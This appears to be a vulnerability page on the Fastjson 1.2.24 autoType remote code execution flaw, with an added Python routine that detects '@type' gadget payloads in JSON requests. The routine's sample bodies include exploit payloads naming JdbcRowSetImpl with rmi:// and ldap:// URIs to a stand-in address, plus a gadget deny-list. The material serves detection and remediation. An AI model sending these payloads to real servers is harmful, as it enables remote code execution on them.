GobyVuls/Fastjson/CNVD-2017-02833
2020-11-06 22:51:39 +08:00

CNVD-2017-02833 Fastjson 1.2.24 RCE

parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java. The same issue is tracked as CVE-2017-18349. The root cause is Fastjson's autoType feature: a JSON object carrying an "@type" key is instantiated as that Java class and its setters are called with the remaining fields, so a request naming com.sun.rowset.JdbcRowSetImpl with dataSourceName set to an attacker-controlled rmi:// or ldap:// URI (and autoCommit set to true, which triggers the connection) makes the server perform a JNDI lookup and load a remote object.

Affected version: Fastjson < 1.2.25 (1.2.25 disables autoType by default and checks the @type class name against a deny list and an explicit allow list; applications that re-enable autoTypeSupport globally lose that protection)
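The following detection routine is an added example, not code from GobyVuls or from Fastjson. It walks a JSON request body and flags the payload shape described above: any "@type" key, escalated when the class is the JdbcRowSetImpl gadget and its dataSourceName points at a remote JNDI provider. The request bodies and the 192.0.2.10 address are constructed for the example; DANGEROUS_TYPES deliberately lists only the gadget this page describes, and real deployments would extend it. Because Fastjson accepts non-standard JSON that a strict parser rejects (single-quoted strings, for example), the routine falls back to a token scan when json.loads fails rather than silently passing the request.

```python
import json
import re
from typing import Any, Dict, Iterator, List, Tuple

# Gadget class the CVE description refers to. Other autoType gadgets exist;
# this set is intentionally limited to what this page documents.
DANGEROUS_TYPES = {"com.sun.rowset.JdbcRowSetImpl"}

# dataSourceName values that make JdbcRowSetImpl perform a remote JNDI lookup.
JNDI_SCHEME = re.compile(r"^\s*(rmi|ldap|ldaps|iiop)://", re.IGNORECASE)

# Fallback token scan for bodies a strict JSON parser cannot load.
AT_TYPE_TOKEN = re.compile(r"@type|\\u0040type", re.IGNORECASE)


def walk(node: Any, path: str = "") -> Iterator[Tuple[str, Dict[str, Any]]]:
    """Yield (json_path, object) for every JSON object in the document, depth-first."""
    if isinstance(node, dict):
        yield path or "/", node
        for key, value in node.items():
            yield from walk(value, f"{path}/{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk(value, f"{path}[{index}]")


def find_autotype_gadgets(body: str) -> List[Dict[str, Any]]:
    """Return one finding per JSON object that carries an "@type" key.

    severity: info     - any @type key (autoType in use, worth logging)
              high     - @type names the JdbcRowSetImpl gadget
              critical - gadget plus a remote JNDI URI in dataSourceName
              medium   - body is not strict JSON but contains an @type token
    """
    findings: List[Dict[str, Any]] = []
    try:
        doc = json.loads(body)  # json.loads already decodes \u0040 to "@"
    except ValueError:
        if AT_TYPE_TOKEN.search(body):
            findings.append({"path": "?", "type": "?", "severity": "medium",
                             "note": "non-strict JSON containing an @type token"})
        return findings

    for path, obj in walk(doc):
        type_name = obj.get("@type")
        if not isinstance(type_name, str):
            continue
        finding: Dict[str, Any] = {"path": path, "type": type_name, "severity": "info"}
        if type_name in DANGEROUS_TYPES:
            finding["severity"] = "high"
            dsn = obj.get("dataSourceName")
            if isinstance(dsn, str) and JNDI_SCHEME.match(dsn):
                finding["severity"] = "critical"
                finding["dataSourceName"] = dsn
        findings.append(finding)
    return findings


# Constructed sample bodies (192.0.2.10 is a documentation address, not a real host).
SAMPLE_EXPLOIT = ('{"@type":"com.sun.rowset.JdbcRowSetImpl",'
                  '"dataSourceName":"rmi://192.0.2.10:1099/Object","autoCommit":true}')
SAMPLE_ESCAPED = (r'{"\u0040type":"com.sun.rowset.JdbcRowSetImpl",'
                  r'"dataSourceName":"ldap://192.0.2.10:1389/a"}')
SAMPLE_NESTED = '{"user":{"@type":"com.example.User","name":"bob"}}'
SAMPLE_BENIGN = '{"name":"alice","age":3}'
SAMPLE_LOOSE = "{'@type':'com.sun.rowset.JdbcRowSetImpl'}"

if __name__ == "__main__":
    for label, body in [("exploit", SAMPLE_EXPLOIT), ("escaped", SAMPLE_ESCAPED),
                        ("nested", SAMPLE_NESTED), ("benign", SAMPLE_BENIGN),
                        ("loose", SAMPLE_LOOSE)]:
        print(label, find_autotype_gadgets(body))
```

The check is a triage aid, not a fix: the only reliable remediation is upgrading Fastjson to 1.2.25 or later and leaving autoType disabled, since the @type key can be reached through many other classes than the one gadget listed here.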

Demo